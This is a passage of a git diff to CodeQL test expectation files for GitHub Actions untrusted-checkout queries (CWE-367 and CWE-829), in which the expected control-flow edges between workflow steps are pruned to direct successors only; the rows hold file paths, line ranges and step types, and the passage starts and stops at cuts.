| .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | | .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test11.yml:14:9:19:6 | Uses Step | -| .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test11.yml:19:9:23:6 | Uses Step | -| .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test11.yml:23:9:24:21 | Run Step | | .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | -| .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:23:9:24:21 | Run Step | | .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:23:9:24:21 | Run Step | | .github/workflows/test12.yml:11:9:14:6 | Uses Step: comment-branch | 
.github/workflows/test12.yml:14:9:19:6 | Uses Step | -| .github/workflows/test12.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test12.yml:19:9:20:30 | Run Step | | .github/workflows/test12.yml:14:9:19:6 | Uses Step | .github/workflows/test12.yml:19:9:20:30 | Run Step | | .github/workflows/test13.yml:14:9:17:6 | Uses Step | .github/workflows/test13.yml:17:9:21:6 | Uses Step | -| .github/workflows/test13.yml:14:9:17:6 | Uses Step | .github/workflows/test13.yml:21:9:22:21 | Run Step | | .github/workflows/test13.yml:17:9:21:6 | Uses Step | .github/workflows/test13.yml:21:9:22:21 | Run Step | | .github/workflows/test14.yml:14:9:17:6 | Uses Step | .github/workflows/test14.yml:17:9:21:6 | Uses Step | -| .github/workflows/test14.yml:14:9:17:6 | Uses Step | .github/workflows/test14.yml:21:9:22:21 | Run Step | | .github/workflows/test14.yml:17:9:21:6 | Uses Step | .github/workflows/test14.yml:21:9:22:21 | Run Step | | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | -| .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:21:9:22:21 | Run Step | | .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:21:9:22:21 | Run Step | | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | -| .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:21:9:22:21 | Run Step | | .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:21:9:22:21 | Run Step | | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:20:9:22:6 | Uses Step | -| .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | | .github/workflows/test17.yml:20:9:22:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | | .github/workflows/test18.yml:15:9:19:6 | Uses Step | 
.github/workflows/test18.yml:19:9:24:6 | Uses Step | -| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:24:9:27:6 | Run Step | -| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | -| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | | .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:24:9:27:6 | Run Step | -| .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | -| .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | | .github/workflows/test18.yml:24:9:27:6 | Run Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | -| .github/workflows/test18.yml:24:9:27:6 | Run Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | | .github/workflows/test18.yml:27:9:30:6 | Run Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:21:9:41:49 | Run Step: check | | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:25:7:31:4 | Uses Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:31:7:33:4 | Uses Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | 
.github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:31:7:33:4 | Uses Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | -| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | -| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | -| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses 
Step | | .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | #select diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected index e2c4d966063..400adb446d2 100644 --- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected 
@@ -1,17 +1,12 @@ edges | .github/workflows/actor.yml:17:9:20:6 | Uses Step | .github/workflows/actor.yml:20:9:21:16 | Run Step | | .github/workflows/comment.yml:13:9:28:6 | Uses Step: issue | .github/workflows/comment.yml:28:9:32:6 | Uses Step | -| .github/workflows/comment.yml:13:9:28:6 | Uses Step: issue | .github/workflows/comment.yml:32:9:34:2 | Run Step | | .github/workflows/comment.yml:28:9:32:6 | Uses Step | .github/workflows/comment.yml:32:9:34:2 | Run Step | | .github/workflows/comment.yml:39:9:54:6 | Uses Step: issue | .github/workflows/comment.yml:54:9:58:6 | Uses Step | -| .github/workflows/comment.yml:39:9:54:6 | Uses Step: issue | .github/workflows/comment.yml:58:9:60:2 | Run Step | | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:22:10:27:7 | Uses Step | -| .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | -| .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | | .github/workflows/deployment.yml:22:10:27:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | -| .github/workflows/deployment.yml:22:10:27:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | | .github/workflows/deployment.yml:27:10:30:7 | Run Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | | .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | | .github/workflows/label_actor.yml:13:9:17:6 | Uses Step | .github/workflows/label_actor.yml:17:9:17:41 | Run Step | 
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 60f3370f6d1..092a7187951 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -1,350 +1,145 @@ edges | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | -| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | -| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | -| .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | -| 
.github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:26 | Run Step | | .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning12.yml:36:9:38:26 | Run Step | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:21 | Run Step | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:20 | Run Step | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | | .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | | .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | 
| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | | .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | | .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:16:9:18:40 | Run Step | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | 
.github/workflows/auto_ci.yml:40:9:44:6 | Run Step | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | -| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | -| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | -| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | -| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | -| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | -| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | -| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | -| .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | -| .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | -| .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | 
.github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | -| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | -| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | -| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | -| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | -| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | -| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | -| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | -| 
.github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | -| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | -| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | -| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | -| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | 
.github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | -| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | -| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | -| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | -| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | -| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | -| .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | -| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | -| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | -| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | -| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | | .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | -| .github/workflows/dependabot1.yml:19:9:23:6 | Run 
Step: nvm | .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | -| .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | -| .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | | .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | -| .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | -| .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | | .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | -| .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | .github/workflows/dependabot1.yml:43:9:45:29 | Uses Step | | .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | -| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | -| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | -| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | -| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | -| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | | .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | -| 
.github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | -| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | -| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | -| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | | .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | -| .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | -| .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | -| .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | -| .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | -| .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | -| .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | 